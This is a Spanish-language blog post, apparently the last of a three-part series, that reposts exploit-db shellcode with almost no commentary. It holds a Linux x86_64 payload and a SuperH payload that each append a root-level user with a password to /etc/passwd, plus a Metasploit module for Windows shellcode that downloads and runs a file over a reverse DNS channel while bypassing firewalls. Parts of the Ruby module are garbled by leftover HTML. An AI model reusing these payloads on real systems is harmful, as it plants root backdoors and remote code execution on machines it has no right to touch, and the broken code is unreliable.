Shellcodes (Parte III de III)

Último artículo de Shellcodes, disfrutarlo! :D

http://www.exploit-db.com/exploits/18585/

Linux x86_64 - add user with passwd (189 bytes);sc_adduser01.S;Arch:          x86_64, Linux;;Author:        0_o -- null_null;           nu11.nu11 [at] yahoo.com;Date:          2012-03-05;;compile an executable: nasm -f elf64 sc_adduser.S;           ld -o sc_adduser sc_adduser.o;compile an object: nasm -o sc_adduser_obj sc_adduser.S;;Purpose:       adds user "t0r" with password "Winner" to /etc/passwd;executed syscalls:     setreuid, setregid, open, write, close, exit;Result:        t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash;syscall op codes:  /usr/include/x86_64-linux-gnu/asm/unistd_64.hBITS 64[SECTION .text]global _start_start:;sys_setreuid(uint ruid, uint euid)xor     rax,    raxmov     al,     113                     ;syscall sys_setreuidxor     rbx,    rbx                     ;arg 1 -- set real uid to rootmov     rcx,    rbx                     ;arg 2 -- set effective uid to rootsyscall;sys_setregid(uint rgid, uint egid)xor     rax,    raxmov     al,     114                     ;syscall sys_setregidxor     rbx,    rbx                     ;arg 1 -- set real uid to rootmov     rcx,    rbx                     ;arg 2 -- set effective uid to rootsyscall;push all strings on the stack prior to file operations.xor rbx,    rbxmov     ebx,    0x647773FFshr     rbx,    8push    rbx                             ;string \00dwsmov     rbx,    0x7361702f6374652fpush    rbx                             ;string sap/cte/mov     rbx,    0x0A687361622F6EFFshr     rbx,    8push    rbx                             ;string \00\nhsab/nmov     rbx,    0x69622F3A746F6F72push    rbx                             ;string ib/:toormov     rbx,    0x2F3A3A303A303A67push    rbx                             ;string /::0:0:gmov rbx,    0x46556B554B587435push    rbx             ;string FUkUKXt5mov rbx,    0x546755333A723074push    rbx             ;string TgU3:r0t;prelude to doing anything useful...mov rbx,    rsp         ;save stack pointer for later usepush    rbp             ;store base pointer to stack so it can be restored latermov rbp,    rsp         ;set base pointer to current stack pointer;sys_open(char* fname, int flags, int mode)sub rsp,        16mov [rbp - 16], rbx     ;store pointer to "t0r..../bash"mov si,     0x0401      ;arg 2 -- flagsmov rdi,        rbxadd rdi,        40      ;arg 1 -- pointer to "/etc/passwd"xor rax,        raxmov al,     2       ;syscall sys_opensyscall;sys_write(uint fd, char* buf, uint size)mov [rbp - 4],  eax     ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.mov rcx,        rbx     ;arg 2 -- load rcx with pointer to string "t0r.../bash"xor rdx,        rdxmov dl,     39      ;arg 3 -- load rdx with size of string "t0r.../bash\00"mov rsi,        rcx     ;arg 2 -- move to source index registermov rdi,        rax     ;arg 1 -- move to destination index registerxor     rax,            raxmov     al,             1               ;syscall sys_writesyscall;sys_close(uint fd)xor rdi,        rdimov edi,        [rbp - 4]   ;arg 1 -- load stored file descriptor to destination index registerxor rax,        raxmov al,     3       ;syscall sys_closesyscall;sys_exit(int err_code)xor rax,    raxmov al, 60          ;syscall sys_exitxor rbx,    rbx         ;arg 1 -- error codesyscall;char shellcode[] =;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31";   "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb";   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63";   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a";   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69";   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35";   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33";   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10";   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28";   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31";   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f";   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48";   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";;;equivalent code:;;char shellcode[] =;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31";   "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb";   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63";   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a";   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69";   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35";   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33";   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10";   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28";   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31";   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f";   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48";   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";-------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17439/SuperH (sh4) Add root user with password/*** Title:     Linux/SuperH - sh4 - add root user with password - 143 bytes** Date:      2011-06-23** Tested on: debian-sh4 2.6.32-5-sh7751r** Author:    Jonathan Salwan - twitter: @jonathansalwan**** http://shell-storm.org**** Informations:** -------------**               - user: shell-storm**               - pswd: toor**               - uid : 0**** open:**         mov      #5, r3**         mova     @(130, pc), r0**         mov      r0, r4**         mov      #255, r13**         mov      #4, r12**         mul.l    r13, r12**         sts      macl, r5**         add      #69, r5**         mov      #84, r13**         mov      #5, r12**         mul.l    r13, r12**         sts      macl, r6**         trapa    #2**         mov      r0, r11**** write:**         xor      r6, r6**         xor      r5, r5**         mov      #4, r3**         mov      r11, r4**         mova     @(20, pc), r0**         mov      r0, r5**         mov      #72, r6**         trapa    #2**** close:**         mov      #6, r3**         mov      r11, r4**         trapa    #2**** exit:**         mov      #1, r3**         xor      r4, r4**         trapa    #2**        ** user:**         .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"**** file:**         .string "@@@/etc/passwd"****** The '@@@' is just for alignment.***/#include #include char *SC =           /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */           "\x05\xe3\x20\xc7\x03\x64\xff\xed"           "\x04\xec\xd7\x0c\x1a\x05\x45\x75"           "\x54\xed\x05\xec\xd7\x0c\x1a\x06"           "\x02\xc3"           /* r11 = fd */           "\x03\x6b"           /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */           "\x6a\x26\x5a\x25\x04\xe3\xb3\x64"           "\x04\xc7\x03\x65\x48\xe6\x02\xc3"           /* close(fd) */           "\x06\xe3\xb3\x64\x02\xc3"           /* exit(0) */           "\x01\xe3\x4a\x24\x02\xc3"           /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */           "\x73\x68\x65\x6c\x6c\x2d\x73\x74"           "\x6f\x72\x6d\x3a\x24\x31\x24\x4b"           "\x51\x59\x6c\x2f\x79\x72\x75\x24"           "\x50\x4d\x74\x30\x32\x7a\x55\x54"           "\x57\x6d\x4d\x76\x50\x57\x63\x55"           "\x34\x6f\x51\x4c\x73\x2f\x3a\x30"           "\x3a\x30\x3a\x72\x6f\x6f\x74\x3a"           "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"           "\x69\x6e\x2f\x62\x61\x73\x68\x5c"           "\x6e"           /* @@@/etc/passwd */           "\x40\x40\x40\x2f\x65\x74\x63\x2f"           "\x70\x61\x73\x73\x77\x64";int main(void){   fprintf(stdout,"Length: %d\n",strlen(SC));   (*(void(*)()) SC)();return 0;}
-----------------------------------------------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17326/DNS Reverse Download and Exec Shellcode
##
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with  Vista/7/2008
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
    include Msf::Payload::Windows
    include Msf::Payload::Single
    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'DNS_DOWNLOAD_EXEC',
            'Version'       => '0.01',
            'Description'   => 'Download and Exec (via DNS)',
            'Author'        => [ 'Alexey Sintsov' ],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Payload'       =>
                {
                    'Offsets' =>{ },
                    'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74
                                \x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78
                                \x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33
                                 \x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73
                                 \x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                    'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF
                                   \x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e
                                   \x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B
                                   \x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F
                                   \x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46
                                   \x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4
                                    \xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54
                                    \x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24
                                    \x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50
                                     \x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57
                                     \x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24
                                      \x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                    'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff
                                  \x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10
                                   \x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B
                                    \xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b
                                    \xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33
                                    \xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66
                                    \x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04
                                     \x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8
                                    \x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61
                                    \xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40
                                      \x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05
                                       \x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33
                                       \xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
                }
            ))
        # We use rtlExitThread(0)
        deregister_options('EXITFUNC')
        # Register the domain and cmd options
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
            ], self.class)
    end
    #
    # Constructs the payload
    #
    def generate_stage
        domain  = datastore['DOMAIN'] || ''
        extens  = datastore['FILE'] || 'vbs'
        # \"x66\x79\x66\x01"
        extLen=extens.length
        while extens.length<4 div="div">
            extens=extens+"\x01"
        end
        i=0
        while i
            extens[i,1]=(extens[i].ord+1).chr
            i=i+1
        end
        while domain.length<10 div="div">
            domain=domain+"\xFF"
        end
        domain="\x2e"+domain
        payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
        return payload
    end
end